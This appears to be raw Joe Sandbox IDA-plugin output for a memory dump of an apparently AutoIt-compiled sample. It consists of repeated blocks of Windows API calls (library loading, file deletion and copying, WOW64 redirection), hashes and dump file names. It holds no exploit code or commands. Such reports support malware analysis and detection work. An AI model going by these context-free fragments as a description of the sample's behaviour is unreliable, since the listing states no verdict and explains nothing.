                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CloseExecuteHandleProcessShell_wcslen
                                                                                                                                                                                                                                                                • String ID: <$@
                                                                                                                                                                                                                                                                • API String ID: 146682121-1426351568
                                                                                                                                                                                                                                                                • Opcode ID: 42a709a68ce01052ff161f748f9565fef42a8c35b3fff7303e877c375928b712
                                                                                                                                                                                                                                                                • Instruction ID: 1a62866bececd0f80fc95c04c55d45aa1355ed97e3a0882c04a037b0854d308b
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 42a709a68ce01052ff161f748f9565fef42a8c35b3fff7303e877c375928b712
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 40715B71A00219DFCB14DF94C485AAEBBF2BF08314F14849DE95AAB362CB74ED41CB95
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: _wcslen
                                                                                                                                                                                                                                                                • String ID: HKEY_LOCAL_MACHINE$HKLM
                                                                                                                                                                                                                                                                • API String ID: 176396367-4004644295
                                                                                                                                                                                                                                                                • Opcode ID: e8c546b488ce723f3be08ebbc8496deb173f90316a387f5ebf1cf14b219809fe
                                                                                                                                                                                                                                                                • Instruction ID: d1ba7414d1791eefe29aa67a682d6efc7bf9706d16501f04baae8b06f2064dd0
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e8c546b488ce723f3be08ebbc8496deb173f90316a387f5ebf1cf14b219809fe
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E6312873A0016D8BCB30DF2D8A514FE33935BA1760F154029ED45AB345EA71ED40D3A0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00702F8D
                                                                                                                                                                                                                                                                • LoadLibraryW.KERNEL32(?), ref: 00702F94
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00702FA9
                                                                                                                                                                                                                                                                • DestroyWindow.USER32(?), ref: 00702FB1
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSend$DestroyLibraryLoadWindow
                                                                                                                                                                                                                                                                • String ID: SysAnimate32
                                                                                                                                                                                                                                                                • API String ID: 3529120543-1011021900
                                                                                                                                                                                                                                                                • Opcode ID: fc54cb31c161be0095dda59ed7be3cbe59d25fe8c7a258da8dc08c1283245a10
                                                                                                                                                                                                                                                                • Instruction ID: b3d02ee2dd0417b003c9b82952fb87693e616c732b1e4c922e11954e870060af
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fc54cb31c161be0095dda59ed7be3cbe59d25fe8c7a258da8dc08c1283245a10
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9F21BE72200206EBEB115F64DC48EBB77F9EB593A4F104718F910920E1C779EC429760
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00694D1E,006A28E9,?,00694CBE,006A28E9,007388B8,0000000C,00694E15,006A28E9,00000002), ref: 00694D8D
                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00694DA0
                                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,00694D1E,006A28E9,?,00694CBE,006A28E9,007388B8,0000000C,00694E15,006A28E9,00000002,00000000), ref: 00694DC3
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                                • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                                • Opcode ID: 5403d0c4a607a27f459d73a536ad62066bb0f1cf51f0aff16972662e2e85aefb
                                                                                                                                                                                                                                                                • Instruction ID: f3419333c6cafe600decfdbb44184401b5e5f98341596a59bd61d97a57e01b37
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5403d0c4a607a27f459d73a536ad62066bb0f1cf51f0aff16972662e2e85aefb
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C6F0A434500208FBDF125F94DC09BEDBBB9EF04712F044294F805A2690DF785981CBD4
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00674EDD,?,00741418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00674E9C
                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00674EAE
                                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,00674EDD,?,00741418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00674EC0
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                                                • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                                                                                                                                                                                • API String ID: 145871493-3689287502
                                                                                                                                                                                                                                                                • Opcode ID: c9887d07969b6d1e62ddb634e5ea42d239e10fa92c74628b10e073ca4317a7db
                                                                                                                                                                                                                                                                • Instruction ID: 0249ce306348c0d6603e60f2f9e1fd9cd093dfc2229196575c1797833a4abe88
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c9887d07969b6d1e62ddb634e5ea42d239e10fa92c74628b10e073ca4317a7db
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 01E08676A01622DBD23317256C1CAAB6555AF81B72B058315FC04D2241DF68CD0180A4
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,?,006B3CDE,?,00741418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00674E62
                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00674E74
                                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,006B3CDE,?,00741418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00674E87
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                                                • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                                                                                                                                                                                • API String ID: 145871493-1355242751
                                                                                                                                                                                                                                                                • Opcode ID: 83f0b41dab3f4fa1427622d50198f9b8b7c36b6c9ed502bd06c375e89840c1c6
                                                                                                                                                                                                                                                                • Instruction ID: 595221ff06e9a9cf671c12505fdd393fc52d049ebe353c8192ef9cf56c6a77c5
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 83f0b41dab3f4fa1427622d50198f9b8b7c36b6c9ed502bd06c375e89840c1c6
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F7D0C27250262197D6331B246C0CDCB2A1EEF85B213058310B808E2250CF68CD0182D4
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 006E2C05
                                                                                                                                                                                                                                                                • DeleteFileW.KERNEL32(?), ref: 006E2C87
                                                                                                                                                                                                                                                                • CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 006E2C9D
                                                                                                                                                                                                                                                                • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 006E2CAE
                                                                                                                                                                                                                                                                • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 006E2CC0
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: File$Delete$Copy
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3226157194-0
                                                                                                                                                                                                                                                                • Opcode ID: 87d0ed4dcf5d94f4f89d27e3e9b12a4b8a88dd7cd13524abc45f9a468887ccbc
                                                                                                                                                                                                                                                                • Instruction ID: bdb2b64b0d7e15ea012ad1e4e7da3dcd38e8021bffba57c44f6c5ab6310878b7
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 87d0ed4dcf5d94f4f89d27e3e9b12a4b8a88dd7cd13524abc45f9a468887ccbc
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D1B17F71D01219ABDF51DFA5CC95EDEB7BEEF48340F1040AAF609E7241EA309A448F65
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32 ref: 006FA427
                                                                                                                                                                                                                                                                • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 006FA435
                                                                                                                                                                                                                                                                • GetProcessIoCounters.KERNEL32(00000000,?), ref: 006FA468
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 006FA63D
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Process$CloseCountersCurrentHandleOpen
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3488606520-0
                                                                                                                                                                                                                                                                • Opcode ID: 383ac20fcf43d71c3632fc07d213c7626996e13bbf4bd98e8cc61e68c3f3734a
                                                                                                                                                                                                                                                                • Instruction ID: 055da942f9e7b55de0ebd746c81dec0c13e6dd58df95c87d01b0ed7126a2a0fd
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 383ac20fcf43d71c3632fc07d213c7626996e13bbf4bd98e8cc61e68c3f3734a
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E0A181B16043009FE760DF24C886F2AB7E6AF84714F14895DF559DB392DBB0EC418B96
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 006DDDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,006DCF22,?), ref: 006DDDFD
                                                                                                                                                                                                                                                                  • Part of subcall function 006DDDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,006DCF22,?), ref: 006DDE16
                                                                                                                                                                                                                                                                  • Part of subcall function 006DE199: GetFileAttributesW.KERNEL32(?,006DCF95), ref: 006DE19A
                                                                                                                                                                                                                                                                • lstrcmpiW.KERNEL32(?,?), ref: 006DE473
                                                                                                                                                                                                                                                                • MoveFileW.KERNEL32(?,?), ref: 006DE4AC
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 006DE5EB
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 006DE603
                                                                                                                                                                                                                                                                • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 006DE650
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3183298772-0
                                                                                                                                                                                                                                                                • Opcode ID: e308a58a90bc4894275aaee9c6ca5cf7023fef5a85df7c06bdf8186e62d53f55
                                                                                                                                                                                                                                                                • Instruction ID: b2cf03a08b8956a4d595ee7323e97c2790993b0fabfa8cfe28c851ec602e8a34
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e308a58a90bc4894275aaee9c6ca5cf7023fef5a85df7c06bdf8186e62d53f55
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 445184B29083459BC764EB90DC819DF73EEAF84340F00491FF589D7251EF75A588876A
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • VariantInit.OLEAUT32(?), ref: 006D8BCD
                                                                                                                                                                                                                                                                • VariantClear.OLEAUT32 ref: 006D8C3E
                                                                                                                                                                                                                                                                • VariantClear.OLEAUT32 ref: 006D8C9D
                                                                                                                                                                                                                                                                • VariantClear.OLEAUT32(?), ref: 006D8D10
                                                                                                                                                                                                                                                                • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 006D8D3B
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Variant$Clear$ChangeInitType
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 4136290138-0
                                                                                                                                                                                                                                                                • Opcode ID: 8ed117dfaa6cd56f923234ad6c20304cd4d5d65759fb139f71bd5d7111e0ecfa
                                                                                                                                                                                                                                                                • Instruction ID: 420bac599c9e208299d8fffa15a29a8a379964d706c6b1db7e92eb172f757908
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8ed117dfaa6cd56f923234ad6c20304cd4d5d65759fb139f71bd5d7111e0ecfa
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 56515CB5A00219EFCB14CF59C894AAAB7FAFF89310B15855AF905DB350E734E911CF90
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 006E8BAE
                                                                                                                                                                                                                                                                • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 006E8BDA
                                                                                                                                                                                                                                                                • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 006E8C32
                                                                                                                                                                                                                                                                • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 006E8C57
                                                                                                                                                                                                                                                                • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 006E8C5F
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: PrivateProfile$SectionWrite$String
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2832842796-0
                                                                                                                                                                                                                                                                • Opcode ID: 9ee934e78daf63341ad2058525b1e429e52f1faf1dd0c7b09856ed6f080b1cb7
                                                                                                                                                                                                                                                                • Instruction ID: 2bc96327ea08724d6645005153950d73d9ae586f16e0eaa6767dbde850ce565a
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9ee934e78daf63341ad2058525b1e429e52f1faf1dd0c7b09856ed6f080b1cb7
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6C515B35A002149FDB05DF65C881AADBBF2FF49314F18C098E809AB362CB35ED41CB94
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • LoadLibraryW.KERNEL32(?,00000000,?), ref: 006F8F40
                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 006F8FD0
                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 006F8FEC
                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 006F9032
                                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 006F9052
                                                                                                                                                                                                                                                                  • Part of subcall function 0068F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,006E1043,?,753CE610), ref: 0068F6E6
                                                                                                                                                                                                                                                                  • Part of subcall function 0068F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,006CFA64,00000000,00000000,?,?,006E1043,?,753CE610,?,006CFA64), ref: 0068F70D
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 666041331-0
                                                                                                                                                                                                                                                                • Opcode ID: bdfe5459d1ff0bfbcc30aa5deab52e7f6f7314beb1a635b78fcbebb3ba265514
                                                                                                                                                                                                                                                                • Instruction ID: 9b4291502f4c9fa178d3d4d71208284d537956e7d2f4d2c61a28920d3bab7f9e
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bdfe5459d1ff0bfbcc30aa5deab52e7f6f7314beb1a635b78fcbebb3ba265514
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 00514834605209DFCB15DF58C4849ADBBF2FF49314B08C1A8E90A9B362DB31ED86CB95
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SetWindowLongW.USER32(00000002,000000F0,?), ref: 00706C33
                                                                                                                                                                                                                                                                • SetWindowLongW.USER32(?,000000EC,?), ref: 00706C4A
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00706C73
                                                                                                                                                                                                                                                                • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,006EAB79,00000000,00000000), ref: 00706C98
                                                                                                                                                                                                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00706CC7
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
